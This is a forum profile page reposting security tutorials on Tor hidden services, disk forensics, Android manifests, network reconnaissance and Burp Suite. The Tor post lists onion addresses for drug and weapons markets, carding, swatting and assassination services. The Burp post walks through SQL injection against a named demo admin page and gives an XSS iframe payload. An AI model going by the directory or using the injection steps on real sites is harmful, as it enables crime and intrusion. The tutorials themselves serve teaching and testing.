Jump to content

Wubi

Active Members
  • Posts

    893
  • Joined

  • Last visited

  • Days Won

    17

Everything posted by Wubi

  1. Some people think onion routing or the Tor network is for criminals and people with something to hide. Well, they are half right. The Tor network was designed to give a masked, “semi-safe”, passage to those who needed to get information out. According to its website, “Tor was originally designed, implemented, and deployed as a third-generation onion routing project of the U.S. Naval Research Laboratory. It was originally developed with the U.S. Navy in mind, for the primary purpose of protecting government communications. Today, it is used every day for a wide variety of purposes by normal people, the military, journalists, law enforcement officers, activists, and many others.” People use Tor as a way to bypass traffic filters or monitors throughout the Internet. If using a minimum of SSL encryption, this medium has been recognized as being a “safer” way to communicate over the Internet. What most people do not realize is that there is an entire subnet underground out there called “Darknet” or “Deepweb”. Others just call the underground Internet Tor network hidden servers. These hidden servers usually have a “.onion” extension and can only be seen using a Tor proxy or TorVPN. The easiest way to get onto the Tor network is with the Tor Browser Bundle (TBB). It is free and very easy to install and then use. All you have to do is go to the torproject.org and download TBB and within minutes you will be connected. There are legitimate reasons to use Tor, especially for those who are trying to hide their identities from oppressive governmental regimes or reporters trying to minimize leaking the identity of informants. Some will even stay on the proxy network and use services like Tor mail, a web based email service. There are still some anonymity challenges. If you are on the same network, you may still leak the originating IP address and there is a risk of someone capturing your traffic. Some will even go as far as only using HTTPS (SSL encryption) or reverting back to the good old VPN. There are darker usages of the hidden servers. There are E-Black Markets all over this network that sell anything from meth to machine guns and services that range from assembling credit card data to assassinations (“you give us a picture; we’ll give you an autopsy report!”). Most of the sites trade their goods with an e-currency called Bitcoins, an anonymous electronic commodity that can purchase almost anything. One of the most popular “secret” sites called “The Silk Road” or SR has almost anything you can think of. SR has evolved over the years and has recently dropped its weapon sales section and created a new site called the Armory. Shortly after, the Armory closed due to the lack of traffic and interest. They have also banned assassination services to minimize attention from showing up on Law Enforcement’s radar. They still have plenty of drugs, counterfeit items, and stolen goods though. There are still plenty of other sites that focus on arms dealing or unfiltered auction site. Once you are on Tor, the next thing you would have to do to communicate with some of these sites is to get an anonymous Tor based email. This is a web based email that you log into that acts just like a regular email except it only exists in the Tor world. Another popular communications mechanism is TorPM. Tor Communications Tor Mail – http://jhiwjjlqpyawmpjx.onion E-Black Market sites The Silk Road: http://silkroadvb5piz3r.onion/index.php Black Market Reloaded: http://5onwnspjvuk7cwvk.onion/index.php Zanzibar’s underground marketplace: http://okx5b2r76olbriil.onion/ TorBlackmarket: http://7v2i3bwsaj7cjs34.onion/ EU Weapons & Ammunition: http://4eiruntyxxbgfv7o.onion/snapbbs/2e76676/ CC4ALL (Credit Card site): http://qhkt6cqo2dfs2llt.onion/ CC Paradise: http://mxdcyv6gjs3tvt5u.onion/ C’thulhu (“organized criminal group”): http://iacgq6y2j2nfudy7.onion/ Assassination Board: http://4eiruntyxxbgfv7o.onion/ Another hitman: http://2v3o2fpukdlpk5nf.onion/ Swattingservice (fake bomb threats): http://jd2iqa4yt7vqvu5o.onion/ Onion-ID (fake ID): http://g6lfrbqd3krju3ek.onion/ Quality Counterfeits: http://i3rg5diydpbxkewu.onion/ Social Network mul.tiver.se: http://ofrmtr2fphxkqgz3.onion/ Informational LiberaTor (weaponry & training): http://p2uekn2yfvlvpzbu.onion/ The Hidden Wiki: http://kpvz7ki2v5agwt35.onion/wiki/ Search Torch: http://xmh57jrzrnw6insl.onion/ Torlinks: http://torlinkbgs6aabns.onion/ So let’s take this step by step. Download “Tor Browser Bundle” from torproject.org. Double left click on “Start Tor Browser”. You should then see Vidalia connecting to Tor. The Tor Browser should automatically open. You are now on the “Deepweb”. You can now access “.onion” domains. Create a TorMail account on jhiwjjlqpyawmpjx.onion. Create a TorPM account on 4eiruntyxxbgfv7o.onion/pm/ Enjoy a little more anonymity for research. Disclaimer: do NOT break the law. This was written to explain what the (Darkweb / Deepnet / Tor hidden service) is and what kind of things you may find. It is not an invitation to break the law with no recourse. Just like any network, this one has both good and bad guys. If you break the law, you will get caught. Bad guys have to be lucky EVERY time. Good guys only have to be lucky once. Sursa InfoSec Institute Resources - The Internet Underground: Tor Hidden Services
  2. Recommended reading [*=left]Computer Forensics | The Study Material [*=left]First Responder’s Guide to Computer Forensics – CERT (search for it on Google) Introduction Sometimes out of curiosity you might happen to hack a government computer, and as the adrenaline is working, you forget to erase some of the traces you’ve done while making the breach. In short, you are doomed…except if you have a plan B…but never mind…you are doomed.The next step that the government will take is disaster control, if you had done something devastating, and also forensic procedures on the crime scene. Just so you know, hacking a computer is illegal, it doesn’t matter if it is a government computer or some random person’s computer, it is still illegal. Hacking with permission is known as penetration testing, where both sides define the rules and the target that should be hacked. So if you want to “play” with forensics, just install and make a virtual environment where you can try the tools for forensics and also perform a penetration testing, or hack without violating any rule or law.This article is just a short guide, so if you want to learn about forensics you cannot do it with reading a short article, it is always better to take a course, read some books or do some researching by yourself. There are thousands of tools and procedures that are implemented differently in every company and country, so in this article I just want to show a simple introduction to forensics and how to use Autopsy for performing the investigation. The rules, the crime and what will be examined So what will be the rules for this article? I will have a straight forward scenario, and it will not be complex at all. I will be using one machine for the attacker and one machine for the victim. Figure 1. Attack me… I dare you I will not reveal the whole scenario now, because I want to present the basics first about forensics like: what is all about, why forensics exists, et al. Through the basics – ohhh……..not again! With the advancing of technology, people advanced also with their knowledge and skills. Sometimes it happens that people are not using their intelligence only for making everyone feel good, sometimes they make bad things like hacking stuff that is not theirs, in short words… they want to “own” stuff, and have control of certain things. With that kind of action they give not just headaches to others, but back pain also. They want to corrupt, steal, and tamper data for fun or for some purpose. Those kinds of actions are results of many reasons like….hate, propaganda, ego, selfishness, money, etc…enough of this, let’s explain some stuff. So what is a HDD? In this article I will describe a scenario for performing a forensics analysis on a Hard Disk, so I will explain this type of memory only. HDD stands for Hard Disk Drive, and like every device this also has unique architecture and purpose. HDD is magnetic data storage device that is used for storing and retrieving information in digital form.The best description for what is HDD and also more informative is: What is computer forensic investigation about? While reading for some time about forensics, I concluded that it is an act of collecting evidence with a procedure that must preserve the state of the evidence. That means when collecting the evidence, the state of the evidence must not be changed at all….remember that: not at all. If you fail to preserve the state of the evidence you will be in trouble, because there might be and will be someone else who expects evidence or someone who will recheck the case.Collection of evidence “in action” on a certain computer first begins with defining the state of the computer like, is it turned off or on. This will help in deciding the next two steps, like if it is turned on there is information that might be stored in RAM (Random Access Memory), and if we turn it off we might lose some information. And if it is turned off, the question is, should we start with duplicating the disk?There are many facts, first of all, we don’t have any information of what happened, like if you have a company that runs a web server, and someday it might happen that your server is hacked. If your company has very sensitive information then you ask yourself is it worth it to chase the guy that hacked your computer (sometimes it might happen that your computer is hacked by your employees) and spending money for a forensic investigation. The laws for computer forensics will not be described since I am not from the US, though mostly the books and the papers that I have read describe the forensic analyses and procedures used in the US, so if you want to read more about it: [*=left]http://www.moreilly.com/CISSP/DomA-2-Computer_Crime_investigation.pdf [*=left]http://euro.ecom.cmu.edu/program/law/08-732/Evidence/RyanShpantzer.pdf [*=left]http://www.sans.org/reading_room/whitepapers/incident/computer-forensic-legal-standards-equipment_648 [*=left]http://www.novalam.com/files/computer_forensics/Computer%20Forensics%20-%20Law%20and%20Privacy.ppt In this article as I mention, I will start with analyzing an HDD, and for that scenario I will make the following steps: [*=left]Making a note about the components of the computer (like serial number, manufacturer, etc.) [*=left]If the state of the machine is active, proceed with capturing and cloning of the memory. If it is not active, start with cloning process of the HDD. [*=left]The next step is to save the image files to a sterile HDD, which will help with preserving the state of the evidence (in this scenario I used my external HDD, formatted in a state that I can’t recover anything from it at all) [*=left]Setting up the tools that will be used [*=left]Reconstructing the crime scene [*=left]Defining evidences (if found) and making a documentation about them [*=left]Seeking the best evidence (something might be used for solving the case) [*=left]The next steps are connected with the law (which I will not explain) procedures about suing, and capturing the criminal etc.. Introduction to Autopsy Forensic Browser I think that it is better to stop with the theory before I write a whole boring book, let’s get to the action. First thing I will describe will be the process of obtaining and cloning the hard disk.Mount a live Back Track disk to avoid direct access to the hard disk and to avoid any writing to it at all. Start Back Track and in the terminal write “fdisk –l” which will enable to you to list all the partitions and hard disks that are currently available. That is displayed in figure 2. Figure 2. List of storage devices Now we can see that “/dev/sdb” is my external hard disk, and “/dev/sda” is my hard disk, but because I made the scenario, I know that I don’t have anything in the second partition, so I will clone only the first partition (/dev/sda2). Figure 3. Usage of ewfacquire Now type “ewfacquire /dev/sda2/” and with that you must enter some information about the whole case. Here is what I have entered (displayed in figure 4): Figure 4. Cloning a disk partition The next step is to wait for the process of cloning to finish; the time of cloning depends of the size of the partition or the hard disk (you know it makes sense). Figure 5. I have waited so long that I fell asleep So now we have the partition in files which numbers may differ because of the size of the partition/disk. I move the files to my external hard disk. The result of it is displayed on figure 6. Figure 6. Cloned partition The next thing to do is configure Autopsy for the investigation. Just so you know, Autopsy is a graphical interface to The Sleuth Kit, which is a collection of tools. They could be used in different OS platforms like Windows and Linux. With the starting of Autopsy (as you can see from figure 7), you need to configure it by entering the directory which will contain the information about the evidence you will collect. Figure 7. Configuring Autopsy After entering the directory, open the link that points to “localhost”, and open the user interface of Autopsy. Figure 8. How Autopsy looks As you can see, we have three options to choose from: Open Case (that is if you previously have created one), New Case (that is if you want to open a new case), and Help (I will not explain what is this for). In order to create a new case, click that New Case button and something as displayed in figure 9 will appear. Figure 9. Creating a new case So when you create a new case, you need to enter Case Name, that is like a serial number of the case (you need it as an ID for the current case), then the description about the case (you insert here any clue or information you have about the case) and the last is inserting the name/s of the investigator. In our scenario I pretend to have no idea what has happened at all. Figure 10. Case created The next thing to do is add the Host (computer) that will be investigated. The Host Name is the name of the computer that is going to be investigated, next is the description and notes about the computer (I entered here the device description and also what is examined).About time zone and the rest of the fields, we do not have any information about the device we are examining, so we leave these fields (just to know time zone is for the files you examine, sometimes it might happen you have a case from a different time zone, the same is with the time skew where you adjust manually how many seconds the computer was out of synchronization, path of alert hash database is an optional database of hash for files that are marked as bad). Figure 11. Adding the host When you create the case and add the host you will see a menu of options (figure 12), where you need to add the images from the cloned hard disk for analyzing. Figure 12. The case Figure 13. Adding the images Add the images with “CS221.*” and define the type of image. The choice depends on what kind of image you have created (is it a partition image or disk image). In my scenario I have create a partition image (volume image). Figure 14. Defining the type of image Figure 15. Last step…case set for investigation This is the last step of this article, wait until the next part where I will describe the features that follow when adding the images and the details of the investigation. Conclusion As I said, this is not the only way of solving a crime. There are thousands of tools you can use to find more and more clues that will help you in solving the case and capturing the villain. This is may not be the best article you have read about forensics, but I must adjust it for everyone to understand and to explain that forensics is very important part of our digital society.Today there are a lot of people that might be a threat for your business, and if you are a serious competitor it’s not bad to have an incident response team who also has the skills of a forensic investigator, because someday they might save your head…..I am just kidding, but I want to tell you that not always will your computers and company be 100% protected, so if plan B fails, always have plan C for just in case, you never know when you are going to use it. References [*=left]Clone a Hard Drive Using an Ubuntu Live CD - How-To Geek [*=left]Cloning a drive the ‘dd’ way | Tanner's Website [*=left]Derek Newton ? Recycle Bin Forensics in Windows 7 and Vista [*=left]Master File Table (MFT) [*=left]What is IT forensics? | IT & Computer forensics beginner’s guide [*=left]Free IT forensic software | Free computer forensic software tools [*=left]Python forensics tools [*=left]How many bytes in a sector? ? Where is Your Data? [*=left]What Is the NTUSER.DAT File? | eHow.com [*=left]Hard disk drive - Wikipedia, the free encyclopedia [*=left]Forensic Examinations Series – Sursa InfoSec Institute Resources - Investigating the Crime Scene, Part 1: A Brief Introduction to Computer Forensics and Autospy
  3. By the end of 2012, the number of Smartphone shipments around the world will explode to nearly 668 million units, and the Android operating system will have a fifty percent market share. This also means an increase in the number of attacks on mobile applications and also in the investment in securing the applications from the attacks. The most important part of performing an application pentest for an Android application is understanding the manifest configuration. Analyzing the manifest file is one of the most important and tedious tasks while performing a penetration testing assessment on the world’s most popular mobile OS. Android is a privilege-separated operating system, in which each application runs with a distinct system identity. At install time, Android gives each package a distinct Linux user ID. The identity remains constant for the duration of the package’s life on that device. On a different device, the same package may have a different UID; what matters is that each package has a distinct UID on a given device. Every Android application must have an AndroidManifest.xml file in its root directory. The manifest presents essential information about the application to the Android system, information the system must have before it can run any of the application’s code. High-level permissions restricting access to entire components of the system or application can be applied through the AndroidManifest.xml. The manifest file does the following: It describes the components like the activities, services, broadcast receivers, and content providers that the application is composed of. These declarations let the Android system know what the components are and under what conditions they can be launched. It determines which processes will host application components. It declares which permissions the application must have in order to access protected parts of the API and interact with other applications. It also declares the permissions that others are required to have in order to interact with the application’s components. It declares the minimum level of the Android API that the application requires. It lists the libraries that the application must be linked against. And moreover, it names the Java package for the application. The package name serves as a unique identifier for the application. AndroidManifest.xml file plays a very important role in analyzing the security of Android mobile applications. The file is of great interest when analyzing system security because it defines the permissions the system and applications enforce. Android packages are .apk files. For test purposes you can download any Android application and extract it and you will see the AndroidManifest.xml file which would be difficult to open. (See below Figure1.0: AndroidManifest.xml natively obfuscated) Here is the step by step methodology to open and review it. 1. Download the following tools: apktool-install-windows-file apktool-file 2. Unpack both to your Windows directory. 3. Now copy the APK file also in that directory and run the following command in your command prompt (See Figure 1.1: Decoding apk application file): apktool d app.apk ./app_decrypted Here app.apk is your Android APK file: 4. This will create a folder “app_decrypted” in your current directory. Inside it you can find the AndroidManifest.xml file in decrypted form and you can also find other XML files inside the “app_decrypted/res/layout” directory. The manifest contains juicy information like permissions, intent filters, and lots more. A typical manifest file is shown below (Figure 1.2: Example of AndroidManifest.xml): Some of the important configuration settings to look for while analyzing a manifest file: [TABLE=class: grid, width: 500] [TR] [TD=align: left]Setting[/TD] [TD=align: left]What to check[/TD] [TD=align: left]Recommendations[/TD] [/TR] [TR] [TD=align: left]android:installLocation[/TD] [TD=align: left]If it is set to “auto”, the application may be installed on the external storage, but the system will install the application on the internal storage by default. [/TD] [/TR] [/TABLE] If the internal storage is full, then the system will install it on the external storage. Once installed, the user can move the application to either internal or external storage through the system settingsUse “internalOnly” value for this setting.android:protectionLevelCharacterizes the potential risk implied in the permission and indicates the procedure the system should follow when determining whether or not to grant the permission to an application requesting it.Check if the value is set to “normal” or “dangerous”. If it is set to “dangerous”, check the permissions.android:persistentWhether or not the application should remain running at all times — “true” if it should, and “false” if not. The default value is “false”.Applications should not normally set this flag. It should be set to “false”android:restoreAnyVersionIndicates that the application is prepared to attempt a restore of any backed-up data set, even if the backup was stored by a newer version of the application than is currently installed on the device.Setting this attribute to true will permit the Backup Manager to attempt restore even when a version mismatch suggests that the data are incompatible Analyzing the manifest file thoroughly could help a penetration tester plan and execute other attacks. After it is done successfully , the remaining testing boils down to a normal web application pentest. So next time when you download any application from Android market, just take a while to open and analyze the AndroidManifest.xml file for fun. Sursa InfoSec Institute Resources - Inside Android Applications
  4. 1. Introduction Whenever we’re doing a penetration test, it’s good to figure out the topology of the network we’re testing. We can’t figure out the whole topology, because we don’t have access to their internal network, but even if we manage to figure out part of the topology it’s pretty cool. But if we want to do that, we must have a pretty good understanding of what type of technology is usually implemented; thus we need to have at least a basic understanding of the following topics: switches, routers, IDS/IPSs, firewalls, VPNs, DMZs, VLANs, etc. This isn’t such a small requirement. First we must describe what all of those things are. For those of you who already know at least something about those topics, it’ll be just a quick refresh, but if you’ve never encountered those, you should probably read more comprehensive material. 2. Networking Internals Switch: A network switch or switching hub is a computer networking device that connects network segments or network devices [1]. We should remember that a network switch is operating at layer 2 OSI/ISO model (some of them also know about layer 3, but let’s forget that for now). You should take a look at the Cisco switches as they are quite popular in larger networks. Router: A router is a device that forwards data packets between computer networks, creating an overlay internetwork. A router is connected to two or more data lines from different networks. When a data packet comes in one of the lines, the router reads the address information in the packet to determine its ultimate destination. Then, using information in its routing table or routing policy, it directs the packet to the next network on its journey. Routers perform the “traffic directing” functions on the Internet [2]. The router is operating at layer 3 OSI/ISO, which means it is capable of doing NAT. NAT is a network address translation, translating WAN IPs into LAN IPs, so the packets can be routed though the internal network. IDS: An intrusion detection system can be software-based or hardware-based and is used to monitor network packets or systems for malicious activity and do a specific action if such activity is detected. Usually, if malicious activity is detected on the network, the source IP of the malicious traffic is blocked for a certain period of time, and all of the packets from that IP address will be rejected. More about this can be read here:InfoSec Institute Resources – Packet Filtering. IPS: The intrusion prevention system is basically an upgrade of the intrusion detection system. Where the IDS is used to detect and log the attack, the IPS is used to detect, block and log the attack. The IPS systems are able to prevent certain attacks while they are happening. There are multiple versions of IPS systems, but we won’t describe them in detail, since they are the same as with IDS systems, with the exception that all of the types of IPS system also prevent the attack from continuing. The types of IPS systems are: NIPS, HIPS, WIPS, NDA. More about this can be read here: InfoSec Institute Resources – Packet Filtering. Firewall: A firewall can either be software-based or hardware-based and is used to help keep a network secure. Its primary objective is to control the incoming and outgoing network traffic by analyzing the data packets and determining whether it should be allowed through or not, based on a predetermined rule set. A network’s firewall builds a bridge between an internal network that is assumed to be secure and trusted, and another network, usually an external (inter)network, such as the Internet, that is not assumed to be secure and trusted. More about this can be read here: InfoSec Institute Resources – Packet Filtering. VPN: A virtual private network (VPN) is a technology for using the Internet or another intermediate network to connect computers to isolated remote computer networks that would otherwise be inaccessible. A VPN provides security so that traffic sent through the VPN connection stays isolated from other computers on the intermediate network. VPNs can connect individual users to a remote network or connect multiple networks together [3]. When the network of a particular company is very big, not all of the hardware can usually be located at the same geographical place. But those hardware devices should nevertheless be part of the same network. So even if those network devices are connected to the Internet half a world away with a different ISP, they still need to be part of the same network. Let’s take a look at a simple example: if a company is dealing with computer hardware sells, they probably have shops all around the country (whatever country) and even in multiple countries. In order to keep those devices part of the same network even though their Internet is provided from different ISPs, the VPNs are used. Thus, through VPNs, users are able to access remote resources as if they were part of the same local network. DMZ: DMZ is a physical or logical subnetwork that contains and exposes an organization’s external-facing services to a larger untrusted network, usually the Internet. The purpose of a DMZ is to add an additional layer of security to an organization’s local area network (LAN); an external attacker only has access to equipment in the DMZ, rather than any other part of the network [4]. We need to put only the servers that should be accessible to the world wide web into the DMZ. Thus, access to the servers in the DMZ zone will be allowed, but any other servers which are part of the same network but not in a DMZ will be hidden. The servers in the DMZ zone also don’t have access to the rest of the internal network, so even if a breach happens, the attacker will only be able to compromise the servers in the DMZ itself. VLAN: VLAN is a concept of partitioning a physical network, so that distinct broadcast domains are created. This is usually achieved on switch or router devices. Grouping hosts with a common set of requirements regardless of their physical location by VLAN can greatly simplify network design. A VLAN has the same attributes as a physical local area network (LAN), but it allows for end stations to be grouped together more easily even if not on the same network switch [5]. VLANs can be used to set up a virtual LAN, where we don’t have to physically relocate the devices, which is really good in virtualized environments. But let’s face it, almost every company today uses a virtualized networking setup. 3. Presenting a Network Topology Here we’ll present a common network topology that can be seen in the picture below. I would like feedback on the picture presented. If you use a different topology can you please write a sentence or two about it so we can gather knowledge about different set-ups. I think various start-up companies can gain by that, because we can present the picture of different topologies, giving them different options to choose from, based on their requirements. The topology below presents the way I see the network should be organized for a middle-sized company that uses /24 IP range. We can see the network topology of a company with /24 IP range. We can see that at the entry point of the network there is a gateway followed by a IDS/IPS system and a firewall. Those are there to block known malicious attacks from attacking the systems in the internal network. After that we can see the SRVdemilitarized zone, which holds all the servers that should be accessible to the outside world. There are also various local networks (LANs), where the VLANs can be in use (common if hardware virtualization is in place). But let’s not forget about the VPNs that can be present if the network is dispersed across multiple geographical locations. 4. Identify Network Topology: Simple Example When identifying network topology of a company, we first need to determine its IP range. To identify the IP range of a Gentoo Linux foundation, we can use nslookup and whois tools as follows: [FONT=monospace]</p><p># nslookup gentoo.org[/FONT] </p><p>Server: 84.255.209.79</p><p>Address: 84.255.209.79#53</p><p></p><p>Non-authoritative answer:</p><p>Name: gentoo.org</p><p>Address: 89.16.167.134</p><p></p><p></p><p></p><p># whois 89.16.167.134</p><p>% Information related to '89.16.167.128 - 89.16.167.143'</p><p></p><p>inetnum: 89.16.167.128 - 89.16.167.143</p><p>status: ASSIGNED PA</p><p>tech-c: BYT2-RIPE</p><p>descr: Gentoo Linux (www.gentoo.org)</p><p>netname: BYTEMARK-GENTOOLINUX</p><p>country: GB</p><p>admin-c: BYT2-RIPE</p><p>source: RIPE # Filtered</p><p>mnt-by: MNT-BYTEMARK [FONT=monospace]</p><p>[/FONT] We can see that the Gentoo Linux has an IP range of 89.16.167.128 – 89.16.167.143, which can be represented with a CIDR 89.16.167.128/28. This can by calculated manually by hand or with an online tool accessible on a web page like this one. We can also see that the Gentoo Linux is hosted at http://www.bytemark.co.uk, which we need to further investigate. To identify the ASN number of the ByteMark hosting company, we can execute the whois command below: # whois -h whois.cymru.com 89.16.167.134 [FONT=arial]</p><p>AS | IP | AS Name</p><p>35425 | 89.16.167.134 | BYTEMARK-AS Bytemark Computer Consulting Ltd</p><p>[/FONT]Cool, the ASN number of “BYTEMARK-AS Bytemark Computer Consulting Ltd” is 35425. But we want to go further; we need to find out all IP addresses that are in the jurisdiction of ByteMark. We can again do this with whois command like this: </p><p># whois -h whois.ripe.net -i origin -T route AS35425 | grep -w "route:" | awk '{print $NF}' | sort -n </p><p>5.153.224.0/21</p><p>46.43.0.0/18</p><p>46.43.35.0/24</p><p>80.68.80.0/20</p><p>80.68.80.0/21</p><p>80.68.88.0/21</p><p>89.16.160.0/19</p><p>91.223.58.0/24</p><p>212.110.160.0/19</p><p>212.110.177.0/24</p><p>213.138.96.0/19 </p><p>Notice that we used the AS35425 number, we learned in the previous step? Okay, so the Gentoo Linux IP range belongs in the 89.16.160.0/19 range. The next thing is to traceroute the IP on the Gentoo Linux domain from different locations to find out the entry points. The results of a traceroute from a web site Free online network tools - traceroute, nslookup, dig, whois lookup, ping - IPv6 are presented below. We can see that the first node in the Bytemark hosting company is 91.223.58.79, which has direct access to the 89.16.167.134 that belongs to Gentoo. This is logical, because the Gentoo Linux doesn’t have its own autonomous system (AS), so the Bytemark should have direct access to its own hosts. Let’s try to run a few more traceroutes from different locations. The results of a traceroute from a web site Traceroute, Ping, Domain Name Server (DNS) Lookup, WHOIS are presented below. We can see the same results as above, the connection to 89.16.167.134 is going through 91.223.58.79. If we run the traceroute from a few more locations we can get a different result, because the packets would be routed from a different Bytemark router with a different IP. We can see that since the Gentoo Linux topology really isn’t that complicated, because they don’t have their own ASN. And their hosting provider Bytemark really shouldn’t have a filter or IDS/IPS system in place, because it’s the job of the end customer to apply those. If the hosting provider would filter the packets destined to the ending IP address (whatever they are running; http, ssh, ftp, etc), they would need to look at the packets themselves and accept/deny them, which can cause a lot of problems. For example, let’s say I’m connecting towww.gentoo.org, but the Bytemark’s hosting filter decides that it will not let my packets through (for whatever reason). Can you see the problem there? It’s not the Bytemark’s decision what packets are going to Gentoo’s website and they shouldn’t decide to allow/block the connections. 5. Conclusion We’ve seen how can we get a basic topology of a really simple company, but often the task is not that simple, because there are multiple filters, IDS/IPS systems in place that can block our requests. Usually the traceroute itself doesn’t print all the hosts on the way to the target, because when the packet is entering the customer’s network, it can be checked, filtered or even blocked. References: [1] Network switch, Wikipedia, accessible on Network switch - Wikipedia, the free encyclopedia. [2] Router (computing), Wikipedia, accessible on http://en.wikipedia.org/wiki/Router_(computing). [3] Virtual private network, Wikipedia, accessible on Virtual private network - Wikipedia, the free encyclopedia. [4] DMZ (computing), Wikipedia, accessible on http://en.wikipedia.org/wiki/DMZ_(computing). [5] Virtual LAN, Wikipedia, accessible on Virtual LAN - Wikipedia, the free encyclopedia. Sursa InfoSec Institute Resources - Network Topology
  5. In this article, we are going to see another powerful framework that is used widely in pen-testing. Burp suite is an integration of various tools put together to work in an effective manner to help the pen-tester in the entire testing process, from the mapping phase to identifying vulnerabilities and exploiting the same. In the figure above, we see the various features of this tool, like proxy, spider, intruder, repeater, sequencer, decoder and comparer. As we move ahead in the tutorial, we shall learn how to make use of them seamlessly. Burp-Proxy This lets you intercept the traffic between the browser and target application. This option works like the man-in-the-middle attack vector. Below I shall show you one of my favorite examples in demonstrating this feature. Here, we are seeing a Wikipedia login form (dummyuser:dummypassword) and we shall see how the intercept is put. Initially we need to switch the intercept mode ON, in the suite. The FORWARD option allows you to send the packets coming from the source IP to the destination IP. The DROP option allows you to drop the packet if you feel it’s not a potential packet that needs analysis. In this figure, we see that the login credentials of en.wikipedia.org are being captured. The point here to note is that Wikipedia uses HTTP instead of HTTPs and thus, the login credentials are captured in clear text. The burp proxy listener is enabled on Port 8080 of the local host. There are various options for intercept set-up, like request methods, matching file extensions, and URL scope for the client requests. Other options like request type, content types, and URL scope in the server responses are available to be set-up based on the attack scenario. I have used Mozilla Firefox here. The same holds for any other browser. The following steps can be many from this phase. The capture can be dropped, or sent to spider, sequencer, comparer etc. There is an option of changing the request methods from GET to POST and so on. Burp-site Map and Site Scope In this section, we are seeing the Burp site maps and site scopes. This section shows us the various sections of a particular domain. Here, we can choose the scope of our security testing. We see a huge number of sub domains when we hit on www.google.com. The figure shows the site-map and site scope. We can also see the pages visited which are darkened, and unvisited pages are grayed. This particular instance in the screenshot shows the searches that are done by the user. I have searched for “Security research”, and using the key word finder, I have highlighted the word “security”. The figure to the left shows the site-map of Google. Google is just used here for a demo. The target web application can be anything under analysis. Burp Spider The spider tool is used to get a complete list of URLs and parameters for each site. The tool looks into each page that was manually visited and goes through every link it finds in the testing scope. Make sure when using spider tool that your proxy and interceptors are switched off. The more links you manually visit, the better spider you are going to get. It simply gives the spider a larger coverage area. Setting up the spider is done using the options menu. The two main things we need to set are the authentication and the thread count. The authentication field can be set with a username and password combination. The reason we set up this is because when the spider comes across a login page, it can go through the authentication process in an automated manner, giving more scope to spider the target. Thread count is the number of concurrent threads that are being used. For a local testing, this count can be high. A higher thread count would imply faster processing but also a larger load. Occasional pop-ups occur asking for changing the scope. Depending on the set up we can choose either a yes or a no. Once we are done spidering the target, we use the scanner. I am using a free edition of the Burp suite, so the scanner is disabled in this. The professional edition has fully functional scanners. The scanner is used to make tests. There are two types of tests: active and passive. Active tests send data and analyze the possibilities. Passive tests examine all traffic and determine the vulnerabilities present in the application. It’s left to the user’s discretion to choose the type of tests that need to be done on the target. Burp-Intruder The intruder has 4 panels as seen in the figure, namely target, positions, payloads and options. Target: This panel is used to specify the target host (the URL), the port to use for the connection, and also it gives options for using SSL encryption depending on our scenario. The figure below shows the target panel. Positions: This panel is very important in automating attack strings on the target. There are various kinds of attack vectors, such as sniper attack, battering ram attack, pitchfork attack and cluster bomb. On observing the figure, we see that the payload positions are automatically highlighted with a “§” character. This happens when you click on the auto button to the right. You can add markers and customize too. A clear option is used to clear all the markers on the page. A sniper attack is used as a single set of payload. Here, only one value is replaced in the entire payload positions, one after the other. Battering ram is also another form of single payload attack. This is used when a single value is needed in the payload position. The Battering ram works fine when the password quality rules, the policies set are allegedly weak in nature. A lot of enumeration has to be gone through before using this form of attack, since it works in a scenario where, for example, the username and password both would have the same values. A pitchfork attack, as we are going to see, is used when we need a multiple payload-set. A cluster bomb is another form of a multiple payload attack vector. In a cluster bomb attack, there are two lists; every word in the first list runs against every word in the second list. It is effectively used when the target has a login form which has to be breached. In this section, I am going to demonstrate a SQLi attack on the demo page of etopshop at the following URL: http://www.etopshop.com/demo/pcstore/admin.asp SQL injection testing using Burp-intruder After capturing the page as described, I custom chose my payload markers as Username fields and Password fields. From here, I deduced that since the attack requires two parameters, I need a multiple payload attack. I chose pitchfork attack vector from the dropdown menu. The figure shows the options being set for the attack. I chose the preset list for adding my SQL attack strings to be tried out at the target. In the figure, we see that we can add, save the preset list of payloads, etc. We have lot of options under the payload set. To mention a few, we have character based, number based, random characters based, brute force, dates, etc. As you can see, I have used the preset list. The figure shows the process of SQL injection, once you click on start-attack. The results tab shows the payloads being sent to the target. The request tab shows the HTML source and how the payloads are placed at our chosen markers. Another tab of interest is the response tab. Here, we see that the injection succeeded and we have been welcomed as the store manager when we analyze the HTML source. To see the web page, we can even click on render. In the figure, we see the successful penetration of the web application, using the famous SQL injection vulnerability. Similarly, XSS attack vulnerabilities can be checked, which I shall leave it to the intuition of the reader, on how to go about it. Burp-Repeater In this section, we shall see the Burp-repeater. This tool is generally used to manually modify the HTTP requests and test the responses given by the page. This can even lead to probing for vulnerabilities on the web-page. Basically, this is used to play back requests to the server. Understanding XSS with Burp-Repeater We shall use a vulnerable web application at: Simple Cookie Stealing for understanding and analyzing XSS (Cross site scripting) Vulnerability in a webpage. In the figure, I have highlighted the attack spot on the webpage, which takes the input, and we will try probing for XSS vulnerabilities. Now, we pass a script tag, the attack string I use is a very simple JavaScript like: <iframe src=”javascript:alert(‘Xss’)”;</iframe> We see that the iframe code is injected into the source of the web page. When checked on the browser to confirm, if there is a XSS bug present in the application, we see that there is a reflected XSS vulnerability on the target as shown in the figure. Burp Sequencer If we want to check for the extent of randomness in the session tokens generated by the web application, this is a tailor made tool to carry out such tests. Brute force attacks enumerate every possible combination for gaining authentication to the web application. This makes it a serious concern to have the high degree of randomness in the session token IDs. Let’s start with sending a request which contains a session token. In this figure you can see the token request to the site Google.com. The right side of the screen shot has the token start and token end expressions. We can either specify an expression like “Google” or even set the offset from where the token has to start. The same thing holds at the token end panel, where we can set the delimiter, or a fixed length for the capture to start. After fixing these parameters, we can click START CAPTURE. The start capture action panel looks like the screenshot above. It sends requests to the target and gives a detailed analysis of the randomness in the cookie tokens. We can pause/stop the analysis when we wish to. I stopped the scan mid-way to see the results of the analysis until the paused values. The screenshot below explains the results better. The scan components are as follows: Overall result Effective Entropy Reliability Sample size considered Burp automatically analyses this aspect and generates this report in this sequencer tool. Other analysis types are character level analysis, which tells us the degree of confidence in the randomness of the sample through a graphical display. Similarly, the bit-level analysis is the analysis done at the bit level. You have the choice to pad characters in the options panel and also to decode in base64 if needed. Burp Decoder This tool enables you to send a request to the decoder. Within the decoder, we have multiple options to encode the request into various formats like base64, URL, etc. There are also options to convert the same to hashes like MD5, SHA-1, etc. The above screenshot shows the Burp decoder for a request. If we have an encoded request like the one in the following screenshot, then the upper part is a request encoded in the base64 format. The lower part is the request decoded in the clear text. I have encoded the entire request. We can also selectively choose a portion of the request to be decoded/encoded here. 